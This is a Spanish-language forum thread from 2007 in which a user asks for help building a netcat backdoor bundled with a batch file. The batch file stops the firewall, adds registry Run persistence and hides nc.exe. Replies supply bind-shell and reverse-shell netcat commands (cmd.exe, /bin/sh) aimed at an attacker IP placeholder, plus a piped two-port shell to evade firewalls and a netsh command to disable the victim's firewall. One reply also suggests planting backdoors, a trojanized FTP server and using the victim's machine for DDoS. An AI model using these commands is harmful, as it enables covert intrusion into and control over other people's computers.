Batch + NetCat (ayuda)

Iniciado por .Undertaker., 1 Octubre 2007, 20:31 PM

0 Miembros y 1 Visitante están viendo este tema.

.Undertaker.

Bueno aqui les pongo lo que hago con el nc..ya que no me funciona:

1.)Lo primero meto el nc.exe en "%systemroot%"(windows).
2.)Creo un .bat:
Citar
@echo off
cls
net stop SharedAccess
rem :con esto detengo el firewall + antivirus no?
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F
rem :agrego el nc.exe para que se inicie con windows
ping -n 5 127.0.0.1
rem :spero un poco
attrib +a +s +h "%systemroot%\nc.exe"
rem :Escondo el nc.exe
exit

Los rems no los coloco en el .bat  ;D ;D
...Lo que keria saber es como abro un puerto en batch...i si podria acer la conexion inversa en batch.

3.)Bindeo el bat mas el nc, cn mas cosas i les digo que se extraigan en "windows"(ejecutandose a su vez...i asi conectarme...)

P.D.Diganme los fallos para poder solucionarlo.




                 

"MI WEB"

Ferсhu

Citarreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F

El fallo es q no sabes usar el netcat. Busca en el foro.

.Undertaker.

Cita de: <~>FeRcHu<~> en  1 Octubre 2007, 22:48 PM
Citarreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F

El fallo es q no sabes usar el netcat. Busca en el foro.

Que le pasa a esa linea del code???




                 

"MI WEB"

darkraider

Lo que esta mal es que no basta con ejecutar el nc a "secas" tenes que especificar parametros para que escuche y en que puerto.
Aparte de esto mirate la sintaxis de netsh que te sirve para abrir puertos. Salu2
Curioso de mi...

.Undertaker.

Cita de: darkraider en  2 Octubre 2007, 11:48 AM
Lo que esta mal es que no basta con ejecutar el nc a "secas" tenes que especificar parametros para que escuche y en que puerto.
Aparte de esto mirate la sintaxis de netsh que te sirve para abrir puertos. Salu2

gracias....Pero aora mira


reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe -vv -l -p 6000" /F

con eso abriria el puerto 6000 para que estuviera a la escucha??

i luego con un netstat -a...Pues averiguo su ip. i ya esta no??




                 

"MI WEB"

darkraider

Si con eso haces que el netcat escuche en el 6000, pero el solito no va a abrir el puerto. Te dije que leas sobre netsh para abrir puertos por consola del firewall de Windows. Lee primero, intentalo y si y solo si te surge una duda al respecto, pregunta. De onda te lo digo, jode escribir algo que ya esta escrito. Salu2
Curioso de mi...

Zykl0n-B

Hola a todos, no sé si llegue tarde a éste Post, pero igual.
Viejo, aquí te dejo los parámetros del comando NETSH para que juegues con el Firewall y toda la configuración de la Red.

Uso: netsh [-a AliasFile] [-c Context] [-r RemoteMachine]
             [Command | -f ScriptFile]

Los siguientes comandos est n disponibles:

Comandos en este contexto:
?              - Muestra una lista de comandos.
add            - Agrega una entrada de configuraci¢n a una lista de entradas.
bridge         - Cambia al contexto `netsh bridge'.
delete         - Elimina la entrada de una configuraci¢n de la lista de entradas.
diag           - Cambia al contexto `netsh diag'.
dump           - Muestra una secuencia de comandos de configuraci¢n.
exec           - Ejecuta un archivo de secuencia de comandos.
firewall       - Cambia al contexto `netsh firewall'.
help           - Muestra una lista de comandos.
interface      - Cambia al contexto `netsh interface'.
ras            - Cambia al contexto `netsh ras'.
routing        - Cambia al contexto `netsh routing'.
set            - Actualiza la configuraci¢n de la informaci¢n.
show           - Muestra informaci¢n.
winsock        - Cambia al contexto `netsh winsock'.

Espero que te sirva, saludos
Die Toten Kehren Wieder Mit Der Wind
          <-~#] Zyklon-B [#~->

WHK

#7
Citarnc.exe -vv -l -p 6000
No te va a resultar ya que primeramente la persona no deberia ver nada asi que Debes quitarle el -vv además Debes agregarle -d (die console) ya que si cierra la ventana entonces se desconectará... también Debes especificar que utilizará la consola de comandos a ejecutar si es eso lo que quieres.

Windows:
nc.exe -d -e cmd.exe -L -p 6000

Linux:
nc -l -d -p 6000 -e /bin/sh
sudo nc -l -d -p 6000 -e /bin/sh

Zykl0n-B

Eh... ¿Die console? esa función es nueva en el Netcat...
Yo conocía era a DETACH ó "Separado" de la consola.. Jaja..

Y sí, todo depende de lo que quieras hacer... si quieres chatear con tu víctima, sí te serviría esa linea de comandos:

"nc.exe -l -p 6000"

Con eso tú desde tu casa te conectas y le dices "Hola, soy yo".

Si quieres una Shell remota de la víctima, tienes varias (Bastantes) formas de hacerlo..

1.-en caso de que tu víctima no tenga el Firewall activado para que no te rebote la conexión..
"nc -d -e cmd.exe -l -p 6000"

2.- En caso de que tenga el Firewall Activado, pues,  hagamos que sea tu victima quién te hackee a tí xD, ésto es posible porque Netcat ejecuta programas con la opción "Execute" (-e) por conexiones entrantes ó salientes, da igual:

Primero deja en tu casa un Netcat a la escucha en el puerto al que tu víctima se vaya a conectar:

"nc -v -v -l -p 6000"

Ahora ejecuta ésto en la Pc victima:

"nc -d -e cmd.exe TU_IP_Ó_DNS 6000"

¡Voilá!, tienes una shell remota, pero si quieres algo más "Educativo", sáltate el Firewall de tu víctima de la siguiente manera:

Deja en tu casa 2 shells abiertas ejecutando a Netcat en modo escucha en los puertos 80 (http) y 25 (smtp):

C:\>nc -v -v -l -p 80
C:\>nv -v -v -l -p 25

Ahora ve a dónde tu víctima y ejecuta ésto:

"nc -d TU_IP_Ó_DNS 80 | cmd | nc -d TU_IP_Ó_DNS 25"

Listo, ahora ¿Qué pasó?
Pues, deberás escribir los comandos en la Shell que dejaste escuchando en el puerto 80.. ¿Pero no te responde nada? jaja, las respuestas a los comandos que escribas por esa shell saldrán en la shell que dejaste escuchando en el puerto 25..

¡Voilá! Otra shell remota

NOTA: Es obvio que tienes que desactivar tu firewall para que la víctima se conecte contigo.

Y una vez que tengas la shell de la víctima, ¿Por qué no desactivar el de él?

C:\Documents and settings\Victima>Netsh FIREWALL set opmode mode = DISABLE

Listo, Firewall desactivado :P

Para activarlo de nuevo sólo escribe lo mismo y suplanta DISABLE por ENABLE

Bájale por TFTP un servidor Ftp "Troyanizado", ejecutalo ocultamente (Serv-U permite hacer eso (-h)) y tendrás vista de todos sus archivos de manera "Gráfica" y no por consola.

Agrégale al Registro de Windows uno ó varios Backdoors, tienes infinidad de formas de hacerlo.

Aprovecha a tirar tus ataques por esa shell, utilízala como Zombie para ataques D.D.O.S., no sé, sólo ponte creativo..
Die Toten Kehren Wieder Mit Der Wind
          <-~#] Zyklon-B [#~->